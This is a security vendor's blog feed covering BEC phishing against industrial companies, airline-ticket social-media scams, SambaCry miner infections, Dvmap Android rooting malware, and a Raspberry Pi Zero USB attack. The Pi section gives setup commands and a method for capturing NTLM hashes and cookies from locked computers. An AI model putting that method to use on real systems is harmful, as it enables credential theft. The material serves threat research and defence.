Malware Alerts

Subscribe to Malware Alerts feed Malware Alerts
Online headquarters of Kaspersky Lab security experts.
Updated: 1 week 3 days ago

Nigerian phishing: Industrial companies under attack

Thu, 06/15/2017 - 05:00

In late 2016, the Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) reported on phishing attacks that were primarily targeting industrial companies from the metallurgy, electric power, construction, engineering and other sectors. As further research demonstrated, this was just part of a bigger story that began much earlier and is unlikely to end any time soon.

Targeted Attack

In October 2016, Kaspersky Lab products detected a surge in malware infection attempts on the computers of our customers who had industrial control systems installed. The malware used in these attacks was a specific modification of an exploit for a vulnerability dating back to 2015.

Further analysis of the incident led us to phishing messages disguised as business correspondence that were used to distribute the exploit.

Phishers have long since discovered the advantages of attacking companies (they obviously have much more money in their accounts than ordinary users and they usually conduct much larger transactions than individuals). The emails used in such attacks are made to look as legitimate as possible so that the employees who receive them open the accompanying malicious attachments without giving them much thought.

In this case, we were dealing with well crafted phishing messages that targeted not only commercial organizations but, in most cases, industrial enterprises. All in all, we discovered over 500 attacked companies in more than 50 countries. Most of these companies are industrial enterprises and large transportation and logistics corporations.

The Emails

The emails were sent on behalf of various companies that did business with potential victims: suppliers, customers, commercial organizations and delivery services. The emails asked recipients to check information in an invoice as soon as possible, clarify product pricing or receive goods specified in the delivery note attached.

Examples of phishing emails

The phishers clearly tried hard to make their fake messages look very convincing to the employees of targeted companies. We have seen attachments with names such as “Energy & Industrial Solutions W.L.L_pdf”, “Woodeck Specifications best Prices Quote.uue” and “Saudi Aramco Quotation Request for October 2016”.

Malicious Files

All the emails had malicious attachments: RTF files with an exploit for the CVE-2015-1641 vulnerability, archives of different formats containing malicious executable files, as well as documents with macros and OLE objects designed to download malicious executable files.

In late 2016, our mail antivirus solutions detected between several hundred and several thousand emails per day containing given exploit for CVE-2015-1641.

Number of daily mail antivirus detections
of the exploit for CVE-2015-1641 (Exploit.MSWord.Agent.hp)

A characteristic feature of such phishing campaigns is that the number of emails sent varies depending on the day of the week: fewer emails are sent on weekends than weekdays.

The malware used in these attacks belonged to families that are popular among cybercriminals, such as ZeuS, Pony/FareIT, LokiBot, Luminosity RAT, NetWire RAT, HawkEye, ISR Stealer, and iSpy keylogger. The phishers selected a toolset that included the functionality they needed, choosing from malware available on cybercriminal forums. At the same time, the malware was packed using VB and .NET packers – a distinct feature of this campaign. To evade detection by security tools, the malicious files were regularly repacked using new modifications of the same packers.

The attackers used malware belonging to at least eight different Trojan-Spy and Backdoor families. All malicious programs selected for these attacks are designed primarily to steal confidential data and install stealthy remote administration tools on infected systems.

Domains Used by the Attackers

When we extracted C&C addresses from the detected malicious files, it turned out that in some cases the same resources were used as command-and-control servers for malware from different families. From this, it can be concluded that either there is one cybercriminal group behind these attacks, using different malware families, or different groups are cooperating closely with each other and using the same C&C to communicate to “their” malware.

The domain names of some of the malware command-and-control servers used by the attackers mimicked domain names used by industrial companies – more proof that the attacks were primarily targeting industrial companies.

An analysis of these domain names sheds light on the tactics used by the phishers. They try to register the same domain name as the targeted company’s legitimate resource, but in a different top-level domain. If this is impossible, the attackers register a domain with a name that looks very similar to the legitimate domain’s name (a standard technique is to replace one or more characters). We have also seen another technique used in these attacks: the domain name is made up of the legitimate site’s name and the name of its top-level domain.

Malware CnC Real industrial company site hi*** hi*** em*** em*** lus*** lus***

Phishing domain names mimicking legitimate domain names

In some cases, the attackers gained unauthorized access to the legitimate websites of industrial companies and used them as a platform for hosting malware and C&C servers. The websites were accessed using credentials stolen earlier from infected computers used by the companies’ employees.

Compromised legitimate site

In the course of our investigation we found that, according to the publicly available information provided by Whois services, most domains used for malware C&C servers were registered to residents of Nigeria. All indications are that these were business email compromise (BEC) attacks that have come to be associated with Nigerian cybercriminals.

Attack Scenario

Business email compromise attacks are well-known. Several scenarios for these attacks have been described to date. Some of these scenarios were used in the targeted attacks we have been investigating.

Attack outline

In the first stage, phishers send emails with malicious attachments – Trojan-Spies or Backdoors. All malware used is available on the black market. It is worth noting that a complete set of malware for carrying out this type of attack usually costs no more than US$200.

Among other things, we have discovered messages sent using compromised email accounts of company employees, in which cybercriminals sent malicious attachments to corporate addresses at other companies.

After infecting a corporate computer, the attackers are able to make screenshots of the correspondence using malware or set up hidden redirection of messages from the attacked computer’s mailbox to their own mailbox. This enables them to track which transactions are being prepared in the company.

After selecting the most promising transaction among those in the pipeline, the attackers register domain names that are very similar to the names of the seller companies. Using the newly registered domains, the cybercriminals are able to carry out a man-in-the-middle attack: they intercept the email with the seller’s invoice and forward it to the buyer after replacing the seller’s account details with the details of an account belonging to the attackers. Alternatively, they can send a request on behalf of the seller for an urgent change of bank details in addition to the seller’s legitimate email containing the invoice.

Hijacking the correspondence between the seller and the buyer using a phishing email address

Another option for the cybercriminals is to send the emails on behalf of a seller with spoofed email header in such a way that it points to the seller’s legitimate mailbox as a sender. It’s worth saying that this way of sending emails is less reliable as some programs and mail servers can reveal the replacement.

In any event the chances of the recipient never suspecting anything and the criminals getting the money are very high.

Nigerian Fishing

‘Nigerian letters’ (a.k.a. 419 scams) have become classics of online fraud. The creators of fascinating stories about heiresses/widows/secretaries/lawyers of deceased millionaires/disgraced dictators/other fat cats didn’t win the Ig Nobel Prize for literature in 2005 for nothing. They may not be very highly qualified, but they certainly have a talent for extortion, and may well have been profiting from the greed and gullibility of their victims for years.

Several years ago, Nigerian phishers appeared on the radar of researchers. They were the same scammers who specialized in so-called Nigerian letters, but at the same time they were mastering new techniques for stealing money – this time, from companies. They are usually the ones behind business email compromise attacks.

There have been a good many publications on phishing attacks by Nigerian fraudsters in the past three years. This is no coincidence: this relatively new type of criminal business is gaining momentum. According to FBI estimates, the damage from Nigerian phisher activity from October 2013 to May 2016 exceeded US$3 billion and the number of affected companies was as high as 22,143. Those companies are scattered across 79 countries of the world.

In 2013-2015, mostly small and medium-size companies were attacked. The phishers gathered the email addresses of potential victims on the Internet.

Cybercriminals exchanging addresses for phishing email distribution. Most addresses are on publicly available email services

Since the fraudsters are interested primarily in companies that buy and sell, they use resources such as Alibaba.

Message with spoofed header and replaced banking details allegedly sent from Alibaba seller’s legitimate email

Phishers also buy databases of email addresses that are of interest to them. Addresses belonging to different categories of company are available on the black market. Relatively small industrial companies are among those targeted by phishers.

An offer to buy categorized email addresses sent to a Nigerian phisher

Clearly, targeted attacks focusing on specific regions already took place in 2015. The screenshot below shows a message that confirms the purchase of a database of UAE company addresses by a Nigerian phisher. This purchase set the cybercriminal back $99.

Purchase of an email address database for attacks on UAE companies by a Nigerian phisher

Some cybercriminals are prepared to pay a small fortune for email addresses:

Purchase of corporate data by a Nigerian phisher for $995

Hunting the Big Phish

Cybercriminals want to steal as much money as possible in one go. As a result, the companies attacked in 2016 included some major corporations.

The average value of a sales transaction can be quite high for a large company. Apparently, Nigerian hackers took note of this in 2016. We believe that a group of Nigerian phishers (or several groups working together) chose industrial and transportation companies as their main targets in 2016.

For example, Palo Alto Networks published two reports in June 2015 and February 2016 based on their analysis of phishing attacks against companies. These reports painted a familiar picture: Nigerian attackers targeted phishing emails and malware that steals confidential data – a Trojan-Spy called KeyBase was used in those attacks. Remarkably, unlike the 2015 attack, the 2016 attack targeted primarily industrial companies.

In August 2016, our colleague studied a series of phishing attacks that he dubbed Operation Ghoul. Operation Ghoul also made use of targeted phishing emails that contained malware designed to steal authentication credentials from different applications, including KeyBase. That operation in fact had much in common with the targeted attacks that we detected in the fall of 2016. In both cases, the attacks targeted mostly industrial companies and the texts of phishing emails and attached files were very similar. We also noticed fake emails sent in both campaigns on behalf of the same sender – Emirates NDB Bank. Finally, in the Operation Ghoul attacks we found files packed with a specific .NET packer (sold on hacker forums as Data Protector) that was one of the markers of the attacks we uncovered.

In the attacks analyzed by Kaspersky Lab, industrial companies account for over 80% of potential victims.

Potential Losses

Nigerian phishing attacks are particularly dangerous for industrial companies. In the event of a successful attack, the company making a purchase not only loses money but also fails to receive the goods they need on time. This can be critical for industrial companies: if the goods are raw materials used in manufacturing or spare parts needed to repair equipment, their non-delivery can result in downtime or failure to perform scheduled maintenance or commissioning and start-up work.

However, there are other possible consequences, as well. The spyware programs used by phishers send a variety of information from infected machines to their command-and-control servers.

We analyzed data from some command-and-control servers used in 2017 attacks. The amount and contents of data obtained by Nigerian phishers is truly disturbing. Cybercriminals have gained access to information on industrial companies’ operations and main assets, including information on contracts and projects.

For example, screenshots found on malware command-and-control servers included various cost estimates and project plans for some of the current projects at victim enterprises.

Screenshots from infected computers

We also found screenshots that were clearly not made on the computers of project managers or procurement managers, but rather on the workstations of operators, engineers, designers and architects. They show, among other things, technical drawings, floor plans, diagrams showing the structure of electrical and information networks.

Screenshots from infected computers

Clearly, this is not needed to carry out the cybercriminals’ Nigerian scams. What do they do with this information? Do they destroy it after completing an attack? Could someone order the theft of data from a specific company?

So far, we have not seen any of the information stolen by Nigerian cybercriminals on the black market. However, it is clear that, for the companies being attacked, in addition to the direct financial loss a Nigerian phishing attack poses other, possibly more serious, threats.

This malicious phishing campaign is ongoing and is unlikely to cease in the foreseeable future.

Phishing attacks agains industrial companies continue

Nigerian phishing is clearly a profitable type of cybercrime that does not require significant financial investment or a high level of technical knowledge. It appears that Nigerian threat actors don’t face stiff competition, at least for now: they readily share information as well as command-and-control servers used by malware. However, as in the case of Nigerian letter scams, this type of cybercriminal activity, can easily be adopted by other criminals. That is if they haven’t already done so, of course.

P.S. The Hidden Threat

And last – though by no means least – it is very dangerous if as a result of an infection cybercriminals gain access to computers that are part of an industrial control system (ICS). In such cases, they can gain remote access to the ICS and unauthorized control over industrial processes.

Remote access to SCADA machines enables attackers to simply switch industrial equipment off or change its settings. There are known cases of hackers changing the parameters of an industrial process without any obvious malicious intent – simply out of curiosity. In 2016, Verizon published data breach digest describes several attacks investigated by the company, including one aimed at the systems of an unnamed US water utility. In the course of the attack, the cybercriminals managed to infiltrate the control system and change the amounts of chemicals used to treat tap water and the flow rate. At the same time, according to Verizon experts, the hackers didn’t understand what the results of the changes they were making would be and changed the settings randomly. In this context, it has to be hoped that the interests of Nigerian phishers will be limited to stealing money and that they won’t tamper with ICS controls.

Unfortunately, there is no guarantee that people who want to carry out acts of sabotage will not gain access to computers in industrial enterprises, including SCADA systems.

Protection Measures

The following measures are needed to mitigate attacks which involve social engineering techniques:

  • Regularly brief employees on security rules when working with email and the Internet. Train employees in the basic rules of cyber-hygiene, such as not opening suspicious links and attachments, carefully checking sender and recipient addresses, company names and the actual domain names from which messages were sent.
  • Inform employees not only about the tools that can be used by cybercriminals, but also about the fraudulent schemes they use.
  • In the course of conducting a transaction, if an unexpected request is received from the seller to change the bank details, payment methods or other parameters of the transaction, it is best to contact the seller by phone or using other methods unrelated to email and ask for confirmation of the changes.

The following protection measures are recommended to minimize the risk of infection and any damage from attacks:

  • Install a security solution on all workstations and servers where possible.
  • Keep security software, signature databases, heuristic and decision rule databases up to date.
  • Where possible, install operating system and software updates without delay.
  • In the event of a system being compromised, change the passwords for all accounts used on that system.
  • Promptly send suspicious emails, attachments and domain names for analysis to highly qualified experts, such as Kaspersky Lab ICS CERT experts.

On industrial information systems, whose composition and configuration cannot be changed quickly, the greatest effect can be achieved by using application startup control and device control technologies in whitelisting mode in combination with application behavior control technologies and protection against network attacks. We also recommend the following measures:

  • Install tools that provide passive monitoring of network activity on the industrial network, capable of detecting newly connected devices, suspicious network connections, and malware network communication. These tools will help to detect and monitor attempts by threat actors to penetrate the enterprise’s network. Importantly, some of these tools are very easy to install and do not require the composition or configuration of the industrial control systems to be changed in any way.
  • Install tools that provide deep analysis of network traffic on the industrial network and detection of commands that can potentially disrupt the industrial process. Using this class of system is absolutely necessary for the detection and timely prevention of advanced attacks designed to physically damage an enterprise’s systems and carried out by highly qualified external or internal threat actors. This type of technology can also be implemented passively, without any impact on the operation of industrial control systems.
  • Minimize the range and quantity of software products used in ICS segments.
  • Restrict the use of computers that are part of an ICS for purposes unrelated to the industrial processes. These measures can be implemented using application startup control tools included in endpoint security solutions.

High-quality and properly configured security solutions help to protect an enterprise against the vast majority of chance infections and many targeted attacks, especially those carried out using tools that are not particularly sophisticated.

Two Tickets as Bait

Sat, 06/10/2017 - 09:21

Over the previous weekend, social networks were hit with a wave of posts that falsely claimed that major airlines were giving away tickets for free. Users from all over the world became involved in this: they published posts that mentioned Emirates, Air France, Aeroflot, S7 Airline, Eva Air, Turkish Airlines, Air Asia, Air India, and other companies. We cannot rule out that similar posts mentioning other brands may appear in the nearest future as well.

Naturally, there have been no promotions to give away airline tickets. Users were addressed by fraudsters who assumed the names of the largest airlines in order to subscribe their victims to paid mobile services, collect personal data, install malware, and increase traffic to websites with advertisements and dubious content. To do this, fraudsters have been registering a multitude of domains, where they host content on behalf of well-known brands. At the mentioned resources, users are congratulated on winning two airline tickets. Then, they’re asked to perform a series of actions to receive the gift. As a result, the victim ends up on another website that belongs to fraudsters, which monetizes their “work” and spreads information about the nonexistent campaign on a social network.

An example of a social-network post with a link to a fraudulent website

This is by no means the first case where users themselves have started spreading fraudulent content on social networks. We have previously about a fake petition in defense of Suarez, which was distributed by Facebook users, fake donations, and pornware. All of the incidents have one thing in common: the threats are distributed over social networks, which users themselves often participate in.

The attack model

Let us return to the most recent case and examine it a bit closer. By following the link from a social network news feed, a user navigates to a fraudulent website. We have found a series of domains that belong to fraudsters:,,,,,,,,, and many others.

Some examples of fraudulent websites that make use of famous airline brands

Since the fraudulent schemes only varied by logo, language, and color scheme, depending on the brand, let’s take one website out of the many and discuss it. The website that claims to belong to American Airlines contains information about a promotional giveaway of two tickets to respondents who must answer three questions.

An example of a fraudulent website that uses American Airlines branding.

After completing the survey, the victim is asked to take two more steps. First, the victim is asked to post the promotional information on his or her page on a social network and thank the airline in the comment. Secondly, the victim has to click the “Like” button. It should be noted that the web page shows what appear to be Facebook comments from users who have already won tickets. An investigation showed that the comments are actually fake. We can even leave our own comment, but it will disappear after the page is refreshed. All of this is directed at coaxing a victim into believing that the page is legitimate.

We would like to note that most comments are posted in various languages by the same people, and the messages are similar in content and most likely are translated using machine translation.

After performing all of the necessary actions, the website redirects the user to various web pages by using the geolocation feature. In some cases, we were redirected to the websites shown below.

Each time all of the same aforementioned actions are performed and the same survey is completed, the website does something different and may redirect users to various web pages. We have found websites with a variety of dubious content, including lotteries, advertisements, new surveys with giveaways, links to suspicious files that can be downloaded, and so on.

Among other things, some websites suggests users download a certain useful file and at the same time urge them to install a potentially dangerous extension for a browser. The extension obtains permission to read all of the data in a browser, potentially allowing fraudsters to get a hold of passwords, logins, credit-card data, and other confidential information entered by the user. Aside from that, later on, the extension may continue spreading links that redirect users to the extension itself on Facebook but on behalf of the user and among his or her friends. This is exactly the threat that was carried out by an attack that we discussed previously.

At the moment of publication, this indicated extension alone had been installed on the systems of over 5,000 users, according to the statistics of the web apps store.

The number of victims and their location

Most resources that utilize the fraudulent scheme contain links to external services that collect statistics for website traffic. These data show that the attack was widely distributed and was mostly directed at smartphone users. For example, here are some impressive statistics for only two of all the domains that we discovered.

Statistics for the website

Statistics for the website

Statistics for the website

Unfortunately, numerous users took the bait of the fraudsters. These users tried their luck and did not pay attention to a multitude of signs that are typical for a scam, which resulted in spreading potentially dangerous content among friends over a social network.

Some examples of published posts with links to fraudulent websites

Thus, fraudulent web resources and a plethora of their counterparts across the Internet gained huge popularity in a matter of hours.
The possibilities of social networks are endless when it comes to spreading information across the globe. These fraudsters only confirm this fact.

Some examples of published posts with links to fraudulent websites

Finally, here are a few pieces of advice.

  • You should be sensibly skeptical about similar “promotions”. Before navigating to suspicious links and entering your personal data on a web resource, you should contact a representative of the company that is supposedly running the promotion and confirm the information.
  • A scrupulous examination of a web resource’s address will help identify fraud. It may be a good idea to verify whether the domain belongs to the company indicated on the website or not. Services that provide whois data about domains may prove helpful in that endeavor.
  • Be responsible when posting content from your account on a social network. In order to avoid becoming involved in a fraudulent scheme, do not spread information with questionable authenticity.
  • Do not install suspicious browser extensions. Upon detection of an installed extension that seems suspicious or whose purpose you do not remember, delete the extension immediately in the settings section of your browser and change the passwords of websites that you visit, especially those dealing with online banking.
  • Use security solutions that protect users from phishing, such as Internet Security-level solutions and higher. They will block any attempts to navigate your browser to fraudulent websites.

SambaCry is coming

Fri, 06/09/2017 - 18:07

Not long ago, news appeared online of a younger sibling for the sensational vulnerability EternalBlue. The story was about a new vulnerability for *nix-based systems – EternalRed (aka SambaCry). This vulnerability (CVE-2017-7494) relates to all versions of Samba, starting from 3.5.0, which was released in 2010, and was patched only in the latest versions of the package (4.6.4/4.5.10/4.4.14).

On May 30th our honeypots captured the first attack to make use of this particular vulnerability, but the payload in this exploit had nothing in common with the Trojan-Crypt that was EternalBlue and WannaCry. Surprisingly, it was a cryptocurrency mining utility!

Vulnerability exploitation

In order to check that an unauthorized user has permissions to write to the network drive, the attackers first try to write a text file, consisting of 8 random symbols. If the attempt is successful they delete the file.

Writing and deleting the text file

After this check, it is time for the exploit’s payload (it is assembled as a Samba plugin). After successful exploitation of the vulnerability, this runs with super-user privileges, although first the attackers have to guess the full path to the dropped file with their payload, starting from the root directory of the drive. We can see such attempts in the traffic captured on our honeypot. They are just brute-forcing the most obvious paths (specified in different manuals, etc.), where files can be stored on the drive.

Bruteforcing the path to the payload

After the path to the file is found, it can be loaded and executed in the context of the Samba-server process, using the SambaCry vulnerability. Afterwards the file is deleted in order to hide the traces. From this moment it exists and runs only in the virtual memory.

In our case two files were uploaded and executed in such a way: (349d84b3b176bbc9834230351ef3bc2a – and (2009af3fed2a4704c224694dfc4b31dc – Trojan-Downloader.Linux.EternalMiner.a).

This file stores the simplest reverse-shell. It connects to the particular port of the IP-address specified by its owner, giving him remote access to the shell (/bin/sh). As a result, the attackers have an ability to execute remotely any shell-commands. They can literally do anything they want, from downloading and running any programs from the Internet, to deleting all the data from the victim’s computer.

Listing of

It’s worth noting that a similar payload can be found in the implementation of the SambaCry exploit in Metasploit.

The main functionality of this file is to download and execute one of the most popular open-source cryptocurrency mining utilities – cpuminer (miderd). It is done by the hardcoded shell-command, shown on the screenshot below.

The main functionality of

The file minerd64_s (8d8bdb58c5e57c565542040ed1988af9 — RiskTool.Linux.BitCoinMiner.a) downloaded in such a way is stored in /tmp/m on the victim’s system.

Cpuminer and what it actually mines

The interesting part is that the version of cpuminer used is “upgraded”, so it can be launched without any parameters to mine currency directly to the hardcoded attackers’ wallet. We obviously became interested in this wallet, so we decided to investigate a bit and uncover the balance of the attackers account.

Along with the attackers’ wallet number, the pool address ( can be found in the body of the miner. This pool is created for mining the open-source cryptocurrency – monero. Using all this data we managed to check out the balance on the attackers’ wallet and the full log of transactions. Let’s have a look:

Balance of the attackers’ account on 08.06.2017

Log of transactions with all the attackers’ cryptocurrency income

The mining utility is downloaded from the domain registered on April 29th 2017. According to the log of the transactions, the attackers received their first crypto-coins on the very next day, on April 30th. During the first day they gained about 1 XMR (about $55 according to the currency exchange rate for 08.06.2017), but during the last week they gained about 5 XMR per day. This means that the botnet of devices working for the profit of the attackers is growing.

Considering that the world discovered the EternalRed vulnerability only at the end of May, and the attackers had already adopted it, the rate of growth in the number of infected machines has significantly increased. After about a month of mining, the attackers gained 98 XMR, which means they earned about $5,500 according to the currency exchange rate at the time of writing.


As a result, the attacked machine turns into a workhorse on a large farm, mining crypto-currency for the attackers. In addition, through the reverse-shell left in the system, the attackers can change the configuration of a miner already running or infect the victim’s computer with other types of malware.

At the moment we don’t have any information about the actual scale of the attack. However, this is a great reason for system administrators and ordinary Linux users to update their Samba software to the latest version immediately to prevent future problems.

Dvmap: the first Android malware with code injection

Thu, 06/08/2017 - 04:58

In April 2017 we started observing new rooting malware being distributed through the Google Play Store. Unlike other rooting malware, this Trojan not only installs its modules into the system, it also injects malicious code into the system runtime libraries. Kaspersky Lab products detect it as Trojan.AndroidOS.Dvmap.a.

The distribution of rooting malware through Google Play is not a new thing. For example, the Ztorg Trojan has been uploaded to Google Play almost 100 times since September 2016. But Dvmap is very special rooting malware. It uses a variety of new techniques, but the most interesting thing is that it injects malicious code into the system libraries – or

This makes Dvmap the first Android malware that injects malicious code into the system libraries in runtime, and it has been downloaded from the Google Play Store more than 50,000 times. Kaspersky Lab reported the Trojan to Google, and it has now been removed from the store.

Trojan.AndroidOS.Dvmap.a on Google Play

To bypass Google Play Store security checks, the malware creators used a very interesting method: they uploaded a clean app to the store at the end of March, 2017, and would then update it with a malicious version for short period of time. Usually they would upload a clean version back on Google Play the very same day. They did this at least 5 times between 18 April and 15 May.

All the malicious Dvmap apps had the same functionality. They decrypt several archive files from the assets folder of the installation package, and launch an executable file from them with the name “start.”

Encrypted archives in the assets folder

The interesting thing is that the Trojan supports even the 64-bit version of Android, which is very rare.

Part of code where the Trojan chooses between 32-bit and 64-bit compatible files

All encrypted archives can be divided into two groups: the first comprises Game321.res, Game322.res, Game323.res and Game642.res – and these are used in the initial phase of infection, while the second group: Game324.res and Game644.res, are used in the main phase.

Initial phase

During this phase, the Trojan tries to gain root rights on the device and to install some modules. All archives from this phase contain the same files except for one called “common”. This is a local root exploit pack, and the Trojan uses 4 different exploit pack files, 3 for 32-bit systems and 1 for 64-bit-systems. If these files successfully gain root rights, the Trojan will install several tools into the system. It will also install the malicious app “com.qualcmm.timeservices.”

These archives contain the file “” which has some comments in Chinese:

Part of file

Main phase

In this phase, the Trojan launches the “start” file from Game324.res or Game644.res. It will check the version of Android installed and decide which library should be patched. For Android 4.4.4 and older, the Trojan will patch method _Z30dvmHeapSourceStartupBeforeForkv from, and for Android 5 and newer it will patch method nativeForkAndSpecialize from Both of these libraries are runtime libraries related to Dalvik and ART runtime environments. Before patching, the Trojan will backup the original library with a name bak_{original name}.


During patching, the Trojan will overwrite the existing code with malicious code so that all it can do is execute /system/bin/ip. This could be very dangerous and cause some devices to crash following the overwrite. Then the Trojan will put the patched library back into the system directory. After that, the Trojan will replace the original /system/bin/ip with a malicious one from the archive (Game324.res or Game644.res). In doing so, the Trojan can be sure that its malicious module will be executed with system rights. But the malicious ip file does not contain any methods from the original ip file. This means that all apps that were using this file will lose some functionality or even start crashing.

Malicious module “ip”

This file will be executed by the patched system library. It can turn off “VerifyApps” and enable the installation of apps from 3rd party stores by changing system settings. Furthermore, it can grant the “com.qualcmm.timeservices” app Device Administrator rights without any interaction with the user, just by running commands. It is a very unusual way to get Device Administrator rights.

Malicious app com.qualcmm.timeservices

As I mentioned before, in the “initial phase”, the Trojan will install the “com.qualcmm.timeservices” app. Its main purpose is to download archives and execute the “start” binary from them. During the investigation, this app was able to successfully connect to the command and control server, but it received no commands. So I don’t know what kind of files will be executed, but they could be malicious or advertising files.


This Trojan was distributed through the Google Play Store and uses a number of very dangerous techniques, including patching system libraries. It installs malicious modules with different functionality into the system. It looks like its main purpose is to get into the system and execute downloaded files with root rights. But I never received such files from their command and control server.

These malicious modules report to the attackers about every step they are going to make. So I think that the authors are still testing this malware, because they use some techniques which can break the infected devices. But they already have a lot of infected users on whom to test their methods.

I hope that by uncovering this malware at such an early stage, we will be able to prevent a massive and dangerous attack when the attackers are ready to actively use their methods.



50 hashes per hour

Tue, 06/06/2017 - 05:00

How often do you turn off your computer when you go home from work? We bet you leave it on so you don’t have to wait until it boots up in the morning. It’s possible that your IT staff have trained you to lock your system for security reasons whenever you leave your workplace. But locking your system won’t save your computer from a new type of attack that is steadily gaining popularity on Raspberry Pi enthusiast forums.

We previously investigated the security of charging a smartphone via a USB port connection. In this research we’ll be revisiting the USB port – this time in attempts to intercept user authentication data on the system that a microcomputer is connected to. As we discovered, this type of attack successfully allows an intruder to retrieve user authentication data – even when the targeted system is locked. It also makes it possible to get hold of administrator credentials. Remember Carbanak, the great bank robbery of 2015, when criminals were able to steal up to a billion dollars? Finding and retrieving the credentials of users with administrative privileges was an important part of that robbery scheme.

In our research we will show that stealing administrator credentials is possible by briefly connecting a microcomputer via USB to any computer within the corporate perimeter. By credentials in this blogpost we mean the user name and password hash and we won’t go into detail how to decipher the retrieved hash, or how to use it in the pass-the-has types of attacks. What we’re emphasizing is that the hardware cost of such an attack is no more than $20 and it can be carried out by a person without any specific skills or qualifications. All that’s needed is physical access to corporate computers. For example, it could be a cleaner who is asked to plug “this thing” into any computer that’s not turned off.

We used a Raspberry Pi Zero in our experiments. It was configured to enumerate itself as an Ethernet adapter on the system it was being plugged into. This choice was dictated by the popularity of Raspberry Pi Zero mentions on forums where enthusiasts discuss the possibility of breaking into information systems with single-board computers. This popularity is understandable, given the device capabilities, size and price. Its developers were able to crank the chip and interfaces into a package that is slightly larger than an ordinary USB flash drive.

Yes, the idea of using microcomputers to intercept and analyze network packets or even as a universal penetration testing platform is nothing new. Most known miniature computing devices are built on ARM microprocessors, and there is a special build of Kali Linux that is specifically developed for pen testing purposes.

There are specialized computing sticks that are designed specifically for pen testing purposes, for example, USB Armory. However, with all its benefits, like integrated USB Type A connector (Raspberry Pi requires an adapter), USB Armory costs much more (around $135) and absolutely pales in comparison when you look at its availability vs. Raspberry Pi Zero. Claims that Raspberry Pi can be used to steal hashes when connected via USB to a PC or Mac surfaced back in 2016. Soon there were claims that Raspberry Pi Zero could also be used for stealing cookies fromh3 browsers – something we also decided to investigate.

So, armed with one of the most widespread and available microcomputers at the moment, we conducted two series of experiments. In the first, we attempted to intercept user credentials within the corporate network, trying to connect to laptop and desktop computers running different operating systems. In the second, we attempted to retrieve cookies in a bid to restore the user session on a popular website.

Experiment 1: stealing domain credentials Methodology

The key principle behind this attack is emulation of the network adapter. We had absolutely no difficulties in finding the module emulating the Ethernet adapter under Raspbian OS (for reference, at the time of writing, we hadn’t found a similar module for Kali Linux). We made a few configuration changes in the cmdline.txt and config.txt files to load the module on boot.

A few extra steps included installing the python interpreter, sqlite3 database library and a special app called Responder for packet sniffing:

apt-get install -y python git python-pip python-dev screen sqlite3
pip install pycrypto
git clone

And that wasn’t all – we set up our own DHCP server where we defined the range of IP addresses and a mask for a subnet to separate it from the network we’re going to peer into. The last steps included configuring the usb0 interface and automatic loading of Responder and DHCP server on boot. Now we were ready to rock.


Just as soon as we connected our “charged” microcomputer to Windows 10, we saw that the connected Raspberry Pi was identified as a wired LAN connection. The Network Settings dialogue shows this adapter as Remote NDIS Internet sharing device. And it’s automatically assigned a higher priority than others.

Responder scans the packets that flow through the emulated network and, upon seeing the username/password hash pairs, directs them to a fake HTTP/HTTPS/NTLM (it supports v1 and v2) server. The attack is triggered every time applications, including those running in the background, send authentication data, or when a user enters them in the standard dialogue windows in the web browser – for example, when user attempts to connect to a shared folder or printer.

Intercepting the hash in automatic mode, which is effective even if the system is locked, only works if the computer has another active local network connection.

As stated above, we tried this proof of concept in three scenarios:

  1. Against a corporate computer logged into a domain
  2. Against a corporate computer on a public network
  3. Against a home computer

In the first scenario we found that the device managed to intercept not only the packets from the system it’s connected to via USB but also NTLM authentication requests from other corporate network users in the domain. We mapped the number of intercepted hashes against the time elapsed, which is shown in the graph below:

Playing around with our “blackbox” for a few minutes, we got proof that the longer the device is connected, the more user hashes it extracts from the network. Extrapolating the “experimental” data, we can conclude that the number of hashes it can extract in our setting is around 50 hashes per hour. Of course, the real numbers depend on the network topology, namely, the amount of users within one segment, and their activity. We didn’t risk running the experiment for longer than half an hour because we also stumbled on some peculiar side effects, which we will describe in a few moments.

The extracted hashes are stored in a plain-text file:

In the second scenario we were only able to extract the connected system’s user credentials: domain/Windows name and password hash. We might have gotten more if we had set up shared network resources which users could try to access, but we’re going to leave that outside the scope of this research.

In the third scenario, we could only get the credentials of the owner of the system, which wasn’t connect to a domain authentication service. Again, we assume that setting up shared network resources and allowing other users to connect to them could lead to results similar to those we observed in the corporate network.

The described method of intercepting the hashes worked on Mac OS, too. When we tried to reach an intranet site which requires entering a domain name, we saw this dialogue warning that the security certificate is invalid.

Now, the interesting side effect we mentioned above was that when the device was connected to a[ny] system in the network, tasks sent out to the network printer from other machines in the same network were put on hold in the printer queue. When the user attempted to enter the credentials in the authentication dialogue window, the queue didn’t clear. That’s because these credentials didn’t reach the network printer, landing in the Raspberry Pi’s flash memory instead. Similar behavior was observed when trying to connect to remote folders via the SMB protocol from a Mac system.

Bonus: Raspberry Pi Zero vs. Raspberry Pi 3

Once we saw that the NTLM systems of both Windows and Mac had come under attack from the microcomputer, we decided to try it against Linux. Furthermore, we decided to attack the Raspberry Pi itself, since Raspbian OS is built on the Debian Weezy core.

We reproduced the experiment, this time targeting Raspberry Pi 3 (by the way, connecting it to the corporate network was a challenging task in itself, but doable, so we won’t focus on it here). And here we had a pleasant surprise – Raspbian OS resisted assigning the higher priority to a USB device network, always choosing the built-in Ethernet as default. In this case, the Responder app was active, but could do nothing because packets didn’t flow through the device. When we manually removed the built-in Ethernet connection, the picture was similar to that we had observed previously with Windows.

Similar behavior was observed on the desktop version of Debian running on Chromebook – the system doesn’t automatically set the USB Ethernet adapter as default. Therefore, if we connect Raspberry Pi Zero to a system running Debian, the attack will fail. And we don’t think that creating Raspberry Pi-in-the-middle attacks is likely to take off, because they are much harder to implement and much easier to detect.

Experiment 2: stealing cookies Methodology

While working on the first experiment, we heard claims that it’s possible to steal cookies from a PC when a Raspberry Pi Zero is connected to it via USB. We found an app called HackPi, a variant of PoisonTap (an XSS JavaScript) with Responder, which we described above.

The microcomputer in this experiment was configured just like in the previous one. HackPi works even better at establishing itself as a network adapter because it has an enhanced mechanism of desktop OS discovery: it is able to automatically install the network device driver on Windows 7/8/10, Mac and –nix operating systems. While in the first series of experiments, an attack could fail on Windows 7, 8 or Vista if the Remote NDIS Internet sharing device didn’t install itself automatically (especially when the PC is locked). And, unlike in the previous series, HackPi never had trouble assigning itself the default network adapter priority under Mac OS either.

What differs from the first experiment is that the cookies are stolen using the malicious Java Script launched from the locally stored web page. If successful, PoisonTap’s script saves the cookies intercepted from sites, a list of which is also locally stored.


